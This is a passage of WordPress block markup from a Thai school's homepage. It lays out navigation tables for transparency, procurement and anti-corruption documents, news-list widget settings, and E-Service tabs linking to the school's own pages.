href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\" data-type=\"page\" data-id=\"1032\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1020\" data-type=\"page\" data-id=\"1020\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1036\" data-type=\"page\" data-id=\"1036\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1052\" data-type=\"page\" data-id=\"1052\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a 